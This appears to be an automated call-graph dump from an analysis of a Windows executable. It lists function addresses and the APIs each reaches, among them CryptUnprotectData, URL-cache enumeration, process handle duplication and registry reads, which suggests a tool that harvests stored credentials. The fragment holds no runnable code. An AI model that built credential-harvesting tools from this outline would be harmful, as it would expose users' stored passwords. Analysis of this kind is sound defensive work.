GetFileAttributesW 38461->38964 38462->38443 38474 445a94 38465->38474 38477 445d54 _wcsicmp 38467->38477 38468->38389 38468->38390 38480 445def 38469->38480 38470 4459cb 38470->38389 38487 40b6ef 249 API calls 38470->38487 38472->38424 38472->38438 38472->38439 38473 445389 255 API calls 38473->38406 38921 40ae18 38474->38921 38475 44566d 38475->38521 38744 413d4c 38475->38744 38484 445d71 38477->38484 38548 445d67 38477->38548 38479 445665 38840 40b1ab free free 38479->38840 38485 409d1f 6 API calls 38480->38485 38965 445093 23 API calls 38484->38965 38492 445e03 38485->38492 38487->38389 38488 4456d8 38494 40b2cc 27 API calls 38488->38494 38491 44563c 38491->38479 38497 4087b3 335 API calls 38491->38497 38966 409b98 GetFileAttributesW 38492->38966 38493 40b6ef 249 API calls 38493->38424 38499 4456e2 38494->38499 38495 40b2cc 27 API calls 38500 445c23 38495->38500 38496 445d83 38496->38424 38497->38491 38842 413fa6 _wcsicmp _wcsicmp 38499->38842 38504 409d1f 6 API calls 38500->38504 38502 445e12 38508 445e6b 38502->38508 38515 40b2cc 27 API calls 38502->38515 38506 445c37 38504->38506 38505 4456eb 38511 4456fd memset memset memset memset 38505->38511 38512 4457ea 38505->38512 38513 445389 255 API calls 38506->38513 38507 445b17 38941 40aebe 38507->38941 38968 445093 23 API calls 38508->38968 38843 409c70 wcscpy wcsrchr 38511->38843 38846 413d29 38512->38846 38519 445c47 38513->38519 38520 445e33 38515->38520 38517 445e7e 38522 445f67 38517->38522 38525 40b2cc 27 API calls 38519->38525 38526 409d1f 6 API calls 38520->38526 38521->38428 38762 403e2d memset memset memset memset memset 38521->38762 38528 40b2cc 27 API calls 38522->38528 38523 445ab2 memset 38529 40b2cc 27 API calls 38523->38529 38531 445c53 38525->38531 38527 445e47 38526->38527 38967 409b98 GetFileAttributesW 38527->38967 38533 445f73 38528->38533 38534 445aa1 38529->38534 38530 409c70 2 API calls 38535 44577e 38530->38535 38536 409d1f 6 API calls 38531->38536 38538 409d1f 6 API calls 38533->38538 38534->38507 38534->38523 38539 409d1f 6 API calls 38534->38539 38547 445389 255 API calls 38534->38547 38928 40add4 38534->38928 38933 40ae51 38534->38933 38540 409c70 2 API calls 38535->38540 38541 445c67 38536->38541 38537 445e56 38537->38508 38545 445e83 memset 38537->38545 38542 445f87 38538->38542 38539->38534 38543 44578d 38540->38543 38544 445389 255 API calls 38541->38544 38971 409b98 GetFileAttributesW 38542->38971 38543->38512 38550 40b2cc 27 API calls 38543->38550 38544->38406 38549 40b2cc 27 API calls 38545->38549 38547->38534 38548->38424 38548->38493 38551 445eab 38549->38551 38552 4457a8 38550->38552 38553 409d1f 6 API calls 38551->38553 38554 409d1f 6 API calls 38552->38554 38555 445ebf 38553->38555 38556 4457b8 38554->38556 38557 40ae18 9 API calls 38555->38557 38845 409b98 GetFileAttributesW 38556->38845 38567 445ef5 38557->38567 38559 4457c7 38559->38512 38561 4087b3 335 API calls 38559->38561 38560 40ae51 9 API calls 38560->38567 38561->38512 38562 445f5c 38564 40aebe FindClose 38562->38564 38563 40add4 2 API calls 38563->38567 38564->38522 38565 40b2cc 27 API calls 38565->38567 38566 409d1f 6 API calls 38566->38567 38567->38560 38567->38562 38567->38563 38567->38565 38567->38566 38569 445f3a 38567->38569 38969 409b98 GetFileAttributesW 38567->38969 38970 445093 23 API calls 38569->38970 38571->38368 38572->38373 38573->38368 38574->38366 38576 40c775 38575->38576 38972 40b1ab free free 38576->38972 38578 40c788 38973 40b1ab free free 38578->38973 38580 40c790 38974 40b1ab free free 38580->38974 38582 40c798 38583 40aa04 free 38582->38583 38584 40c7a0 38583->38584 38975 40c274 memset 38584->38975 38589 40a8ab 9 API calls 38590 40c7c3 38589->38590 38591 40a8ab 9 API calls 38590->38591 38592 40c7d0 38591->38592 39004 40c3c3 38592->39004 38596 40c877 38605 40bdb0 38596->38605 38597 40c86c 39032 4053fe 37 API calls 38597->39032 38600 40c813 _wcslwr 39030 40c634 47 API calls 38600->39030 38602 40c829 wcslen 38603 40c7e5 38602->38603 38603->38596 38603->38597 39029 40a706 wcslen memcpy 38603->39029 39031 40c634 47 API calls 38603->39031 39166 404363 38605->39166 38610 40b2cc 27 API calls 38611 40be02 wcslen 38610->38611 38612 40bf5d 38611->38612 38620 40be1e 38611->38620 39183 40440c 38612->39183 38613 40be26 wcsncmp 38613->38620 38616 40be7d memset 38617 40bea7 memcpy 38616->38617 38616->38620 38618 40bf11 wcschr 38617->38618 38617->38620 38618->38620 38619 40b2cc 27 API calls 38621 40bef6 _wcsnicmp 38619->38621 38620->38612 38620->38613 38620->38616 38620->38617 38620->38618 38620->38619 38622 40bf43 LocalFree 38620->38622 39186 40bd5d 28 API calls 38620->39186 39187 404423 38620->39187 38621->38618 38621->38620 38622->38620 38623 4135f7 39199 4135e0 38623->39199 38626 40b2cc 27 API calls 38627 41360d 38626->38627 38628 40a804 8 API calls 38627->38628 38629 413613 38628->38629 38630 41363e 38629->38630 38632 40b273 27 API calls 38629->38632 38631 4135e0 FreeLibrary 38630->38631 38633 413643 38631->38633 38634 413625 38632->38634 38633->38392 38634->38630 38635 413648 38634->38635 38636 413658 38635->38636 38637 4135e0 FreeLibrary 38635->38637 38636->38392 38638 413666 38637->38638 38638->38392 38641 4136e2 38639->38641 38640 413827 38838 41366b FreeLibrary 38640->38838 38641->38640 38642 4137ac CoTaskMemFree 38641->38642 38642->38641 39202 4449b9 38643->39202 38646 444c1f 38646->38378 38647 4449b9 35 API calls 38649 444b4b 38647->38649 38648 444c15 38651 4449b9 35 API calls 38648->38651 38649->38648 39222 444972 GetVersionExW 38649->39222 38651->38646 38652 444b8c 38653 444b99 memcmp 38652->38653 38654 444c0b 38652->38654 39223 444aa5 35 API calls 38652->39223 39224 40a7a0 GetVersionExW 38652->39224 39225 444a85 35 API calls 38652->39225 38653->38652 39226 444a85 35 API calls 38654->39226 38660 40399d 38659->38660 39227 403a16 38660->39227 38662 403a09 39241 40b1ab free free 38662->39241 38664 403a12 wcsrchr 38664->38385 38665 4039a3 38665->38662 38668 4039f4 38665->38668 39238 40a02c CreateFileW 38665->39238 38668->38662 38669 4099c6 2 API calls 38668->38669 38669->38662 38671 414c2e 16 API calls 38670->38671 38672 404048 38671->38672 38673 414c2e 16 API calls 38672->38673 38674 404056 38673->38674 38675 409d1f 6 API calls 38674->38675 38676 404073 38675->38676 38677 409d1f 6 API calls 38676->38677 38678 40408e 38677->38678 38679 409d1f 6 API calls 38678->38679 38680 4040a6 38679->38680 38681 403af5 20 API calls 38680->38681 38682 4040ba 38681->38682 38683 403af5 20 API calls 38682->38683 38684 4040cb 38683->38684 39268 40414f memset 38684->39268 38686 404140 39282 40b1ab free free 38686->39282 38688 4040ec memset 38691 4040e0 38688->38691 38689 404148 38689->38445 38690 4099c6 2 API calls 38690->38691 38691->38686 38691->38688 38691->38690 38692 40a8ab 9 API calls 38691->38692 38692->38691 39295 40a6e6 WideCharToMultiByte 38693->39295 38695 4087ed 39296 4095d9 memset 38695->39296 38698 408809 memset memset memset memset memset 38699 40b2cc 27 API calls 38698->38699 38700 4088a1 38699->38700 38701 409d1f 6 API calls 38700->38701 38702 4088b1 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 4088c0 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 4088d0 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 4088df 38707->38708 38709 409d1f 6 API calls 38708->38709 38710 4088ef 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 4088fe 38711->38712 38730 408953 38730->38445 38745 40b633 free 38744->38745 38746 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38745->38746 38747 413f00 Process32NextW 38746->38747 38748 413da5 OpenProcess 38747->38748 38749 413f17 CloseHandle 38747->38749 38750 413df3 memset 38748->38750 38753 413eb0 38748->38753 38749->38488 39345 413f27 38750->39345 38752 413ebf free 38752->38753 38753->38747 38753->38752 38754 4099f4 3 API calls 38753->38754 38754->38753 38755 413e37 GetModuleHandleW 38757 413e46 38755->38757 38759 413e1f 38755->38759 38757->38759 38758 413e6a QueryFullProcessImageNameW 38758->38759 38759->38755 38759->38758 39350 413959 38759->39350 39366 413ca4 38759->39366 38761 413ea2 CloseHandle 38761->38753 38763 414c2e 16 API calls 38762->38763 38764 403eb7 38763->38764 38765 414c2e 16 API calls 38764->38765 38766 403ec5 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403ee2 38767->38768 38769 409d1f 6 API calls 38768->38769 38770 403efd 38769->38770 38771 409d1f 6 API calls 38770->38771 38772 403f15 38771->38772 38773 403af5 20 API calls 38772->38773 38774 403f29 38773->38774 38775 403af5 20 API calls 38774->38775 38776 403f3a 38775->38776 38777 40414f 33 API calls 38776->38777 38783 403f4f 38777->38783 38778 403faf 39379 40b1ab free free 38778->39379 38779 403f5b memset 38779->38783 38781 403fb7 38781->38427 38782 4099c6 2 API calls 38782->38783 38783->38778 38783->38779 38783->38782 38784 40a8ab 9 API calls 38783->38784 38784->38783 38786 414c2e 16 API calls 38785->38786 38787 403d26 38786->38787 38788 414c2e 16 API calls 38787->38788 38789 403d34 38788->38789 38790 409d1f 6 API calls 38789->38790 38791 403d51 38790->38791 38792 409d1f 6 API calls 38791->38792 38793 403d6c 38792->38793 38794 409d1f 6 API calls 38793->38794 38795 403d84 38794->38795 38796 403af5 20 API calls 38795->38796 38797 403d98 38796->38797 38798 403af5 20 API calls 38797->38798 38799 403da9 38798->38799 38800 40414f 33 API calls 38799->38800 38806 403dbe 38800->38806 38801 403e1e 39380 40b1ab free free 38801->39380 38802 403dca memset 38802->38806 38804 403e26 38804->38443 38805 4099c6 2 API calls 38805->38806 38806->38801 38806->38802 38806->38805 38807 40a8ab 9 API calls 38806->38807 38807->38806 38809 414b81 8 API calls 38808->38809 38810 414c40 38809->38810 38811 414c73 memset 38810->38811 39381 409cea 38810->39381 38813 414c94 38811->38813 39384 414592 RegOpenKeyExW 38813->39384 38815 414c64 SHGetSpecialFolderPathW 38817 414d0b 38815->38817 38817->38447 38818 414cc1 38819 414cf4 wcscpy 38818->38819 39385 414bb0 wcscpy 38818->39385 38819->38817 38821 414cd2 39386 4145ac RegQueryValueExW 38821->39386 38823 414ce9 RegCloseKey 38823->38819 38825 409d62 38824->38825 38826 409d43 wcscpy 38824->38826 38829 445389 38825->38829 38827 409719 2 API calls 38826->38827 38828 409d51 wcscat 38827->38828 38828->38825 38830 40ae18 9 API calls 38829->38830 38835 4453c4 38830->38835 38831 40ae51 9 API calls 38831->38835 38832 4453f3 38834 40aebe FindClose 38832->38834 38833 40add4 2 API calls 38833->38835 38836 4453fe 38834->38836 38835->38831 38835->38832 38835->38833 38837 445403 250 API calls 38835->38837 38836->38495 38837->38835 38838->38399 38839->38491 38840->38475 38841->38475 38842->38505 38844 409c89 38843->38844 38844->38530 38845->38559 38847 413d39 38846->38847 38848 413d2f FreeLibrary 38846->38848 38849 40b633 free 38847->38849 38848->38847 38850 413d42 38849->38850 38851 40b633 free 38850->38851 38852 413d4a 38851->38852 38852->38521 38853->38428 38854->38435 38855->38457 38857 44db70 38856->38857 38858 40b6fc memset 38857->38858 38859 409c70 2 API calls 38858->38859 38860 40b732 wcsrchr 38859->38860 38861 40b743 38860->38861 38862 40b746 memset 38860->38862 38861->38862 38863 40b2cc 27 API calls 38862->38863 38864 40b76f 38863->38864 38865 409d1f 6 API calls 38864->38865 38866 40b783 38865->38866 39387 409b98 GetFileAttributesW 38866->39387 38868 40b792 38870 409c70 2 API calls 38868->38870 38882 40b7c2 38868->38882 38872 40b7a5 38870->38872 38875 40b2cc 27 API calls 38872->38875 38873 40b837 CloseHandle 38877 40b83e memset 38873->38877 38874 40b817 39491 409a45 GetTempPathW 38874->39491 38878 40b7b2 38875->38878 39421 40a6e6 WideCharToMultiByte 38877->39421 38879 409d1f 6 API calls 38878->38879 38879->38882 38880 40b827 38880->38877 39388 40bb98 38882->39388 38883 40b866 39422 444432 38883->39422 38886 40bad5 38889 40b04b ??3@YAXPAX 38886->38889 38887 40b273 27 API calls 38888 40b89a 38887->38888 39468 438552 38888->39468 38891 40baf3 38889->38891 38891->38468 38893 40bacd 39471 443d90 38893->39471 38896 40bac6 39521 424f26 122 API calls 38896->39521 38897 40b8bd memset 39512 425413 17 API calls 38897->39512 38900 425413 17 API calls 38918 40b8b8 38900->38918 38903 40a71b MultiByteToWideChar 38903->38918 38904 40a734 MultiByteToWideChar 38904->38918 38907 40b9b5 memcmp 38907->38918 38908 4099c6 2 API calls 38908->38918 38909 404423 37 API calls 38909->38918 38912 4251c4 136 API calls 38912->38918 38913 40bb3e memset memcpy 39522 40a734 MultiByteToWideChar 38913->39522 38915 40bb88 LocalFree 38915->38918 38918->38896 38918->38897 38918->38900 38918->38903 38918->38904 38918->38907 38918->38908 38918->38909 38918->38912 38918->38913 38919 40ba5f memcmp 38918->38919 39513 4253ef 16 API calls 38918->39513 39514 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38918->39514 39515 4253af 17 API calls 38918->39515 39516 4253cf 17 API calls 38918->39516 39517 447280 memset 38918->39517 39518 447960 memset memcpy memcpy memcpy 38918->39518 39519 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38918->39519 39520 447920 memcpy memcpy memcpy 38918->39520 38919->38918 38920->38470 38922 40aebe FindClose 38921->38922 38923 40ae21 38922->38923 38924 4099c6 2 API calls 38923->38924 38925 40ae35 38924->38925 38926 409d1f 6 API calls 38925->38926 38927 40ae49 38926->38927 38927->38534 38929 40ade0 38928->38929 38932 40ae0f 38928->38932 38930 40ade7 wcscmp 38929->38930 38929->38932 38931 40adfe wcscmp 38930->38931 38930->38932 38931->38932 38932->38534 38934 40ae7b FindNextFileW 38933->38934 38935 40ae5c FindFirstFileW 38933->38935 38936 40ae94 38934->38936 38937 40ae8f 38934->38937 38935->38936 38939 40aeb6 38936->38939 38940 409d1f 6 API calls 38936->38940 38938 40aebe FindClose 38937->38938 38938->38936 38939->38534 38940->38939 38942 40aed1 38941->38942 38943 40aec7 FindClose 38941->38943 38942->38396 38943->38942 38945 4099d7 38944->38945 38946 4099da memcpy 38944->38946 38945->38946 38946->38453 38948 40b2cc 27 API calls 38947->38948 38949 44543f 38948->38949 38950 409d1f 6 API calls 38949->38950 38951 44544f 38950->38951 39905 409b98 GetFileAttributesW 38951->39905 38953 44545e 38954 445476 38953->38954 38955 40b6ef 249 API calls 38953->38955 38956 40b2cc 27 API calls 38954->38956 38955->38954 38957 445482 38956->38957 38958 409d1f 6 API calls 38957->38958 38959 445492 38958->38959 39906 409b98 GetFileAttributesW 38959->39906 38961 4454a1 38962 4454b9 38961->38962 38963 40b6ef 249 API calls 38961->38963 38962->38473 38963->38962 38964->38472 38965->38496 38966->38502 38967->38537 38968->38517 38969->38567 38970->38567 38971->38548 38972->38578 38973->38580 38974->38582 38976 414c2e 16 API calls 38975->38976 38977 40c2ae 38976->38977 39033 40c1d3 38977->39033 38982 40c3be 38999 40a8ab 38982->38999 38983 40afcf 2 API calls 38984 40c2fd FindFirstUrlCacheEntryW 38983->38984 38985 40c3b6 38984->38985 38986 40c31e wcschr 38984->38986 38987 40b04b ??3@YAXPAX 38985->38987 38988 40c331 38986->38988 38989 40c35e FindNextUrlCacheEntryW 38986->38989 38987->38982 38991 40a8ab 9 API calls 38988->38991 38989->38986 38990 40c373 GetLastError 38989->38990 38992 40c3ad FindCloseUrlCache 38990->38992 38993 40c37e 38990->38993 38994 40c33e wcschr 38991->38994 38992->38985 38995 40afcf 2 API calls 38993->38995 38994->38989 38996 40c34f 38994->38996 38997 40c391 FindNextUrlCacheEntryW 38995->38997 38998 40a8ab 9 API calls 38996->38998 38997->38986 38997->38992 38998->38989 39127 40a97a 38999->39127 39002 40a8cc 39002->38589 39003 40a8d0 7 API calls 39003->39002 39132 40b1ab free free 39004->39132 39006 40c3dd 39007 40b2cc 27 API calls 39006->39007 39008 40c3e7 39007->39008 39133 414592 RegOpenKeyExW 39008->39133 39010 40c3f4 39011 40c50e 39010->39011 39012 40c3ff 39010->39012 39026 405337 39011->39026 39013 40a9ce 4 API calls 39012->39013 39014 40c418 memset 39013->39014 39134 40aa1d 39014->39134 39017 40c471 39019 40c47a _wcsupr 39017->39019 39018 40c505 RegCloseKey 39018->39011 39020 40a8d0 7 API calls 39019->39020 39021 40c498 39020->39021 39022 40a8d0 7 API calls 39021->39022 39023 40c4ac memset 39022->39023 39024 40aa1d 39023->39024 39025 40c4e4 RegEnumValueW 39024->39025 39025->39018 39025->39019 39136 405220 39026->39136 39028 405340 39028->38603 39029->38600 39030->38602 39031->38603 39032->38596 39034 40ae18 9 API calls 39033->39034 39040 40c210 39034->39040 39035 40ae51 9 API calls 39035->39040 39036 40c264 39037 40aebe FindClose 39036->39037 39039 40c26f 39037->39039 39038 40add4 2 API calls 39038->39040 39045 40e5ed memset memset 39039->39045 39040->39035 39040->39036 39040->39038 39041 40c231 _wcsicmp 39040->39041 39042 40c1d3 34 API calls 39040->39042 39041->39040 39043 40c248 39041->39043 39042->39040 39058 40c084 21 API calls 39043->39058 39046 414c2e 16 API calls 39045->39046 39047 40e63f 39046->39047 39048 409d1f 6 API calls 39047->39048 39049 40e658 39048->39049 39059 409b98 GetFileAttributesW 39049->39059 39051 40e667 39052 409d1f 6 API calls 39051->39052 39054 40e680 39051->39054 39052->39054 39060 409b98 GetFileAttributesW 39054->39060 39055 40e68f 39056 40c2d8 39055->39056 39061 40e4b2 39055->39061 39056->38982 39056->38983 39058->39040 39059->39051 39060->39055 39082 40e01e 39061->39082 39063 40e593 39064 40e5b0 39063->39064 39065 40e59c DeleteFileW 39063->39065 39066 40b04b ??3@YAXPAX 39064->39066 39065->39064 39068 40e5bb 39066->39068 39067 40e521 39067->39063 39105 40e175 39067->39105 39070 40e5c4 CloseHandle 39068->39070 39071 40e5cc 39068->39071 39070->39071 39073 40b633 free 39071->39073 39072 40e573 39074 40e584 39072->39074 39075 40e57c CloseHandle 39072->39075 39076 40e5db 39073->39076 39126 40b1ab free free 39074->39126 39075->39074 39077 40b633 free 39076->39077 39079 40e5e3 39077->39079 39079->39056 39081 40e540 39081->39072 39125 40e2ab 30 API calls 39081->39125 39083 406214 22 API calls 39082->39083 39084 40e03c 39083->39084 39085 40e16b 39084->39085 39086 40dd85 60 API calls 39084->39086 39085->39067 39087 40e06b 39086->39087 39087->39085 39088 40afcf ??2@YAPAXI ??3@YAXPAX 39087->39088 39089 40e08d OpenProcess 39088->39089 39090 40e0a4 GetCurrentProcess DuplicateHandle 39089->39090 39094 40e152 39089->39094 39091 40e0d0 GetFileSize 39090->39091 39092 40e14a CloseHandle 39090->39092 39095 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39091->39095 39092->39094 39093 40e160 39097 40b04b ??3@YAXPAX 39093->39097 39094->39093 39096 406214 22 API calls 39094->39096 39098 40e0ea 39095->39098 39096->39093 39097->39085 39099 4096dc CreateFileW 39098->39099 39100 40e0f1 CreateFileMappingW 39099->39100 39101 40e140 CloseHandle CloseHandle 39100->39101 39102 40e10b MapViewOfFile 39100->39102 39101->39092 39103 40e13b CloseHandle 39102->39103 39104 40e11f WriteFile UnmapViewOfFile 39102->39104 39103->39101 39104->39103 39106 40e18c 39105->39106 39107 406b90 11 API calls 39106->39107 39108 40e19f 39107->39108 39109 40e1a7 memset 39108->39109 39110 40e299 39108->39110 39116 40e1e8 39109->39116 39111 4069a3 ??3@YAXPAX free 39110->39111 39112 40e2a4 39111->39112 39112->39081 39113 406e8f 13 API calls 39113->39116 39114 406b53 SetFilePointerEx ReadFile 39114->39116 39115 40dd50 _wcsicmp 39115->39116 39116->39113 39116->39114 39116->39115 39117 40e283 39116->39117 39121 40742e 8 API calls 39116->39121 39122 40aae3 wcslen wcslen _memicmp 39116->39122 39123 40e244 _snwprintf 39116->39123 39118 40e291 39117->39118 39119 40e288 free 39117->39119 39120 40aa04 free 39118->39120 39119->39118 39120->39110 39121->39116 39122->39116 39124 40a8d0 7 API calls 39123->39124 39124->39116 39125->39081 39126->39063 39129 40a980 39127->39129 39128 40a8bb 39128->39002 39128->39003 39129->39128 39130 40a995 _wcsicmp 39129->39130 39131 40a99c wcscmp 39129->39131 39130->39129 39131->39129 39132->39006 39133->39010 39135 40aa23 RegEnumValueW 39134->39135 39135->39017 39135->39018 39137 40522a 39136->39137 39162 405329 39136->39162 39138 40b2cc 27 API calls 39137->39138 39139 405234 39138->39139 39140 40a804 8 API calls 39139->39140 39141 40523a 39140->39141 39163 40b273 39141->39163 39143 405248 _mbscpy _mbscat 39144 40526c 39143->39144 39145 40b273 27 API calls 39144->39145 39146 405279 39145->39146 39147 40b273 27 API calls 39146->39147 39148 40528f 39147->39148 39149 40b273 27 API calls 39148->39149 39150 4052a5 39149->39150 39151 40b273 27 API calls 39150->39151 39152 4052bb 39151->39152 39153 40b273 27 API calls 39152->39153 39154 4052d1 39153->39154 39155 40b273 27 API calls 39154->39155 39156 4052e7 39155->39156 39157 40b273 27 API calls 39156->39157 39158 4052fd 39157->39158 39159 40b273 27 API calls 39158->39159 39160 405313 39159->39160 39161 40b273 27 API calls 39160->39161 39161->39162 39162->39028 39164 40b58d 27 API calls 39163->39164 39165 40b18c 39164->39165 39165->39143 39167 40440c FreeLibrary 39166->39167 39168 40436d 39167->39168 39169 40a804 8 API calls 39168->39169 39170 404377 39169->39170 39171 4043f7 39170->39171 39172 40b273 27 API calls 39170->39172 39171->38610 39171->38612 39173 40438d 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043a7 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043ba 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043ce 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4043e2 39180->39181 39181->39171 39182 40440c FreeLibrary 39181->39182 39182->39171 39184 404413 FreeLibrary 39183->39184 39185 40441e 39183->39185 39184->39185 39185->38623 39186->38620 39188 40447e 39187->39188 39189 40442e 39187->39189 39190 404485 CryptUnprotectData 39188->39190 39191 40449c 39188->39191 39192 40b2cc 27 API calls 39189->39192 39190->39191 39191->38620 39193 404438 39192->39193 39194 40a804 8 API calls 39193->39194 39195 40443e 39194->39195 39196 40444f 39195->39196 39197 40b273 27 API calls 39195->39197 39196->39188 39198 404475 FreeLibrary 39196->39198 39197->39196 39198->39188 39200 4135f6 39199->39200 39201 4135eb FreeLibrary 39199->39201 39200->38626 39201->39200 39203 4449c4 39202->39203 39221 444a48 39202->39221 39204 40b2cc 27 API calls 39203->39204 39205 4449cb 39204->39205 39206 40a804 8 API calls 39205->39206 39207 4449d1 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449dc 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4449f3 39210->39211 39221->38646 39221->38647 39222->38652 39223->38652 39224->38652 39225->38652 39226->38648 39228 403a29 39227->39228 39242 403bed memset memset 39228->39242 39230 403ae7 39255 40b1ab free free 39230->39255 39231 403a3f memset 39235 403a2f 39231->39235 39233 403aef 39233->38665 39234 409d1f 6 API calls 39234->39235 39235->39230 39235->39231 39235->39234 39236 409b98 GetFileAttributesW 39235->39236 39237 40a8d0 7 API calls 39235->39237 39236->39235 39237->39235 39239 40a051 GetFileTime CloseHandle 39238->39239 39240 4039ca CompareFileTime 39238->39240 39239->39240 39240->38665 39241->38664 39243 414c2e 16 API calls 39242->39243 39244 403c38 39243->39244 39245 409719 2 API calls 39244->39245 39246 403c3f wcscat 39245->39246 39247 414c2e 16 API calls 39246->39247 39248 403c61 39247->39248 39249 409719 2 API calls 39248->39249 39250 403c68 wcscat 39249->39250 39256 403af5 39250->39256 39253 403af5 20 API calls 39254 403c95 39253->39254 39254->39235 39255->39233 39257 403b02 39256->39257 39258 40ae18 9 API calls 39257->39258 39267 403b37 39258->39267 39259 403bdb 39261 40aebe FindClose 39259->39261 39260 40add4 wcscmp wcscmp 39260->39267 39262 403be6 39261->39262 39262->39253 39263 40a8d0 7 API calls 39263->39267 39264 40ae18 9 API calls 39264->39267 39265 40ae51 9 API calls 39265->39267 39266 40aebe FindClose 39266->39267 39267->39259 39267->39260 39267->39263 39267->39264 39267->39265 39267->39266 39269 409d1f 6 API calls 39268->39269 39270 404190 39269->39270 39283 409b98 GetFileAttributesW 39270->39283 39272 40419c 39273 4041a7 6 API calls 39272->39273 39274 40435c 39272->39274 39275 40424f 39273->39275 39274->38691 39275->39274 39277 40425e memset 39275->39277 39279 409d1f 6 API calls 39275->39279 39280 40a8ab 9 API calls 39275->39280 39284 414842 39275->39284 39277->39275 39278 404296 wcscpy 39277->39278 39278->39275 39279->39275 39281 4042b6 memset memset _snwprintf wcscpy 39280->39281 39281->39275 39282->38689 39283->39272 39287 41443e 39284->39287 39286 414866 39286->39275 39288 41444b 39287->39288 39289 414451 39288->39289 39290 4144a3 GetPrivateProfileStringW 39288->39290 39291 414491 39289->39291 39292 414455 wcschr 39289->39292 39290->39286 39294 414495 WritePrivateProfileStringW 39291->39294 39292->39291 39293 414463 _snwprintf 39292->39293 39293->39294 39294->39286 39295->38695 39297 40b2cc 27 API calls 39296->39297 39298 409615 39297->39298 39299 409d1f 6 API calls 39298->39299 39300 409625 39299->39300 39323 409b98 GetFileAttributesW 39300->39323 39302 409634 39303 409648 39302->39303 39340 4091b8 238 API calls 39302->39340 39305 40b2cc 27 API calls 39303->39305 39307 408801 39303->39307 39306 40965d 39305->39306 39308 409d1f 6 API calls 39306->39308 39307->38698 39307->38730 39309 40966d 39308->39309 39324 409b98 GetFileAttributesW 39309->39324 39311 40967c 39311->39307 39325 409529 39311->39325 39323->39302 39324->39311 39341 4096c3 CreateFileW 39325->39341 39327 409543 39328 4095cd 39327->39328 39329 409550 GetFileSize 39327->39329 39328->39307 39330 409577 CloseHandle 39329->39330 39331 40955f 39329->39331 39330->39328 39336 409585 39330->39336 39332 40afcf 2 API calls 39331->39332 39333 409569 39332->39333 39342 40a2ef ReadFile 39333->39342 39335 409574 39335->39330 39336->39328 39337 4095c3 39336->39337 39343 408b8d 38 API calls 39336->39343 39344 40908b 55 API calls 39337->39344 39340->39303 39341->39327 39342->39335 39343->39336 39344->39328 39372 413f4f 39345->39372 39348 413f37 K32GetModuleFileNameExW 39349 413f4a 39348->39349 39349->38759 39351 413969 wcscpy 39350->39351 39352 41396c wcschr 39350->39352 39364 413a3a 39351->39364 39352->39351 39354 41398e 39352->39354 39376 4097f7 wcslen wcslen _memicmp 39354->39376 39356 41399a 39357 4139a4 memset 39356->39357 39358 4139e6 39356->39358 39377 409dd5 GetWindowsDirectoryW wcscpy 39357->39377 39360 413a31 wcscpy 39358->39360 39361 4139ec memset 39358->39361 39360->39364 39378 409dd5 GetWindowsDirectoryW wcscpy 39361->39378 39362 4139c9 wcscpy wcscat 39362->39364 39364->38759 39365 413a11 memcpy wcscat 39365->39364 39367 413cb0 GetModuleHandleW 39366->39367 39368 413cda 39366->39368 39367->39368 39369 413cbf 39367->39369 39370 413ce3 GetProcessTimes 39368->39370 39371 413cf6 39368->39371 39369->39368 39370->38761 39371->38761 39373 413f54 39372->39373 39375 413f2f 39372->39375 39374 40a804 8 API calls 39373->39374 39374->39375 39375->39348 39375->39349 39376->39356 39377->39362 39378->39365 39379->38781 39380->38804 39382 409cf9 GetVersionExW 39381->39382 39383 409d0a 39381->39383 39382->39383 39383->38811 39383->38815 39384->38818 39385->38821 39386->38823 39387->38868 39389 40bba5 39388->39389 39523 40cc26 39389->39523 39392 40bd4b 39544 40cc0c 39392->39544 39397 40b2cc 27 API calls 39398 40bbef 39397->39398 39551 40ccf0 _wcsicmp 39398->39551 39400 40bbf5 39400->39392 39552 40ccb4 6 API calls 39400->39552 39402 40bc26 39403 40cf04 17 API calls 39402->39403 39404 40bc2e 39403->39404 39405 40bd43 39404->39405 39406 40b2cc 27 API calls 39404->39406 39407 40cc0c 4 API calls 39405->39407 39408 40bc40 39406->39408 39407->39392 39553 40ccf0 _wcsicmp 39408->39553 39410 40bc46 39410->39405 39411 40bc61 memset memset WideCharToMultiByte 39410->39411 39554 40103c strlen 39411->39554 39413 40bcc0 39414 40b273 27 API calls 39413->39414 39415 40bcd0 memcmp 39414->39415 39415->39405 39416 40bce2 39415->39416 39417 404423 37 API calls 39416->39417 39418 40bd10 39417->39418 39418->39405 39419 40bd3a LocalFree 39418->39419 39420 40bd1f memcpy 39418->39420 39419->39405 39420->39419 39421->38883 39614 4438b5 39422->39614 39424 44444c 39425 40b879 39424->39425 39628 415a6d 39424->39628 39425->38886 39425->38887 39427 4442e6 11 API calls 39429 44469e 39427->39429 39428 444486 39430 4444b9 memcpy 39428->39430 39467 4444a4 39428->39467 39429->39425 39432 443d90 110 API calls 39429->39432 39632 415258 39430->39632 39432->39425 39433 444524 39434 444541 39433->39434 39435 44452a 39433->39435 39635 444316 39434->39635 39436 416935 16 API calls 39435->39436 39436->39467 39439 444316 18 API calls 39440 444563 39439->39440 39441 444316 18 API calls 39440->39441 39442 44456f 39441->39442 39443 444316 18 API calls 39442->39443 39444 44457f 39443->39444 39444->39467 39649 432d4e 39444->39649 39447 444316 18 API calls 39448 4445b0 39447->39448 39653 41eed2 39448->39653 39450 4445cf 39451 4445d6 39450->39451 39452 4445ee 39450->39452 39455 416935 16 API calls 39451->39455 39669 43302c 39452->39669 39455->39467 39456 43302c memset 39457 444609 39456->39457 39457->39467 39675 416935 39457->39675 39467->39427 39747 438460 39468->39747 39470 40b8a4 39470->38893 39494 4251c4 39470->39494 39472 443da3 39471->39472 39490 443db6 39471->39490 39835 41707a 11 API calls 39472->39835 39474 443da8 39475 443dbc 39474->39475 39476 443dac 39474->39476 39837 4300e8 memset memset memcpy 39475->39837 39836 4446ea 11 API calls 39476->39836 39479 443de0 39480 416935 16 API calls 